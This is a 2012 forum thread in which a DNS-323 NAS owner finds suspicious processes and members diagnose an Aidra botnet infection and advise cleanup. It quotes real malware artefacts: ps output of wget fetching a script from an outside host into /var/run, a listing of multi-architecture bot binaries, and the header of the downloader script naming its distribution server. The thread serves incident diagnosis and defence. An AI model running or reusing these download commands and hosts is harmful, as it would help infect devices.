DSM-G600, DNS-3xx and NSA-220 Hack Forum

Unfortunately no one can be told what fun_plug is - you have to see it for yourself.

You are not logged in.

Announcement

Pages: 1

 

#1 2012-01-24 20:58:12

fboulange
Member
Registered: 2010-10-06
Posts: 29

DNS-323 Unwanted.Suspicious command ?

Dear DNS-323 users.

I've been using my DNS for over 2 years now and lately it seemed running slow.
Therefor I reboot it and looked what was going on with a simple "ps" command.


I saw an unwanted/suspicious command :

Code:

1783 root     sh -c wget http://www.swlink.net/~styma/REMOTE_ADDR.shtml -T 3 -
1784 root     wget http://www.swlink.net/~styma/REMOTE_ADDR.shtml -T 3 -q -O /

Anyone got similar thing or know what it is ?
Cheers,

Fr3d

DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10

Offline

 

#2 2012-01-24 21:20:10

Mijzelf
Member / Developer
Registered: 2008-07-05
Posts: 709

Re: DNS-323 Unwanted.Suspicious command ?

Running any DDNS scripts? According to this page the url should return your public IP address. But the server is down.

Last edited by Mijzelf (2012-01-24 21:20:47)

Offline

 

#3 2012-01-24 21:28:24

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted.Suspicious command ?

Mijzelf wrote:

Running any DDNS scripts? According to this page the url should return your public IP address. But the server is down.

None that I'm aware of...
Fr3d

DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10

Offline

 

#4 2012-02-06 22:47:41

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted.Suspicious command ?

Well it(s getting really annoying...
Here is the ps result lately :

Code:

27363 root     wget -c http://aban-co.ir/patrick/sh.sh.gz -P /var/run
13073 root     /ffp/bin/sh
30829 root     /ffp/bin/sh
30831 root     [sh]
15933 root     /ffp/bin/sh
21453 root     /ffp/bin/sh
21455 root     [sh]
21461 root     /var/run/armd
22591 root     /ffp/bin/sh
22592 root     /ffp/bin/sh
 6689 root     /ffp/bin/sh
24929 root     /var/run/armd
24930 root     /var/run/armd
15644 root     pure-ftpd (IDLE)
18362 root     /usr/sbin/samba/smbd -D
18366 root     /usr/sbin/samba/smbd -D
18367 root     /usr/sbin/samba/nmbd -D
19783 root     sshd: root@pts/45
22734 root     -sh
22865 root     /var/run/armd
22866 root     /var/run/armd
22867 root     /var/run/armd
22868 root     /var/run/armd
22869 root     /var/run/armd
22870 root     /var/run/armd
22871 root     /var/run/armd
22872 root     /var/run/armd
22873 root     /var/run/armd
22874 root     /var/run/armd
22875 root     /var/run/armd
22876 root     /var/run/armd
22877 root     /var/run/armd
22878 root     /var/run/armd
22879 root     /var/run/armd
22880 root     /var/run/armd
22881 root     /var/run/armd
22882 root     /var/run/armd
22883 root     /var/run/armd
22884 root     /var/run/armd
22885 root     /var/run/armd
22886 root     /var/run/armd
22887 root     /var/run/armd
22888 root     /var/run/armd
22889 root     /var/run/armd
22890 root     /var/run/armd
22891 root     /var/run/armd
22892 root     /var/run/armd
22893 root     /var/run/armd
22894 root     /var/run/armd
22895 root     /var/run/armd
22896 root     /var/run/armd
22897 root     /var/run/armd

and the /var/run contents :

Code:

root@Fred_NAS:/var/run# ls -la
drwxr-xr-x    3 root     root         1024 Feb  6 21:39 .
drwxr-xr-x    8 root     root         1024 Feb  5 22:04 ..
-rw-r--r--    1 root     root            5 Feb  6 18:16 .lightpid
-rw-r--r--    1 root     root         9361 Feb  6 21:46 .lightscan
-rw-r--r--    1 root     root            5 Feb  6 05:45 aidra.pid
-rwxr-xr-x    1 root     root       203430 Feb  6 05:45 arm
-rwxr-xr-x    1 root     root       202448 Feb  6 18:16 armd
-rw-r--r--    1 root     root        61952 Feb  6 16:33 armon.gz
-rw-r--r--    1 root     root            5 Feb  5 22:04 atd.pid
-rw-r--r--    1 root     root            5 Feb  5 22:04 lpd.515
srwxrwxrwx    1 root     root            0 Feb  5 22:04 lprng
-rw-r-----    1 root     root            5 Feb  5 22:04 minidlna.pid
-rwxr-xr-x    1 root     root       266075 Feb  6 05:45 mips
-rwxr-xr-x    1 root     root       266209 Feb  6 18:16 mipsd
-rwxr-xr-x    1 root     root       266136 Feb  6 05:45 mipsel
-rwxr-xr-x    1 root     root       266270 Feb  6 18:16 mipseld
-rwxr-xr-x    1 root     root       196445 Feb  6 05:45 ppc
-rwxr-xr-x    1 root     root       195047 Feb  6 18:16 ppcd
-rw-r--r--    1 root     root            5 Feb  5 22:04 pure-ftpd.pid
drwxr-xr-x    2 root     root         1024 Feb  6 21:45 samba
-rwxr-xr-x    1 root     root       180846 Feb  6 05:45 sh
-rw-r--r--    1 root     root          336 Feb  6 21:39 sh.sh.gz.gz
-rwxr-xr-x    1 root     root       179800 Feb  6 18:16 shd
-rw-r--r--    1 root     root            5 Feb  5 22:04 sshd.pid
-rw-r--r--    1 root     root          384 Feb  6 21:44 utmp
srwxrwxrwx    1 root     root            0 Feb  5 22:04 xmldb_sock
-rw-r--r--    1 root     root            4 Feb  5 22:04 xmldb_sock_config.pid

Any ideas ?
Can you tell me how to block outside access to my DNS-323 and limit it to MAC adresse I will provide ?
Cheers.
Fred

DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10

Offline

 

#5 2012-02-07 00:09:56

KRH
Member
From: Denmark
Registered: 2006-10-27
Posts: 219
Website

Re: DNS-323 Unwanted.Suspicious command ?

yout box have been hacket.. you need to remove all funplug files and change password..

First user to fun_plug the dns-323.

Offline

 

#6 2012-02-07 01:29:19

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted.Suspicious command ?

Right... that's what I thought...

Any tips on how removing funplug files ?
I've already changer my root password several times... Is there a proper way to do it ?
I killed all suspicious process for now but I'll think they'll comme back if I do not remover them all properly.
And then how to protect it once everything is cleaned ?
Cheers
Fr3d

Last edited by fboulange (2012-02-07 01:37:09)

DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10

Offline

 

#7 2012-02-07 15:22:07

Mijzelf
Member / Developer
Registered: 2008-07-05
Posts: 709

Re: DNS-323 Unwanted.Suspicious command ?

Any tips on how removing funplug files ?

Reverse the installation. delete the fun_plug script, reboot the box, and remove/rename the ffp tree.

I've already changer my root password several times...

As long as the malware has daemons running with root credentials, and/or is autostarted, it doesn't matter what the  root password is.
BTW, I downloaded that 'http://aban-co.ir/patrick/sh.sh.gz' script, and it *suggests* that it's installed via a vulnerability in a webinterface.

Code:

#!/bin/sh
# THIS SCRIPT DOWNLOAD THE BINARIES INTO ROUTER.
# UPLOAD GETBINARIES.SH IN YOUR HTTPD.

# YOUR HTTPD SERVER
REFERENCE_HTTP="http://80.82.222.66"

# NAME OF BINARIES (UPLOADED IN YOUR HTTPD)
REFERENCE_MIPSEL="mipselon.gz"
REFERENCE_MIPS="mipson.gz"
REFERENCE_SUPERH="shon.gz"
REFERENCE_ARM="armon.gz"
REFERENCE_PPC="ppcon.gz"

Smells like a scriptkiddie.
Are you running badly written PHP?

And then how to protect it once everything is cleaned ?

Use strong passwords, do not open more ports than necessary, and review your webserver content.

Offline

 

#8 2012-02-07 23:42:30

fboulange
Member
Registered: 2010-10-06
Posts: 29

Re: DNS-323 Unwanted.Suspicious command ?

Ok I've cleaned my box (as long as I know...).
Thanks for your advices (I've uninstalled lighttpd)

Reinstalled ffp0.7 btw
Now I've got to find a way to compile my dlna server : mindlna on ffp0.7...
Cheers

DNS-323 1.9 ~ miniDLNA Samsung patched ~Transmission 2.10

Offline

 

#9 2012-02-10 15:45:32

splash
New member
Registered: 2012-02-10
Posts: 1

Re: DNS-323 Unwanted.Suspicious command ?

You were infected with Aidra: http://ahacktivia.org/index.php?noticeid=10

Offline

 

 

Pages: 1

Board footer

Powered by PunBB
© Copyright 2002–2010 PunBB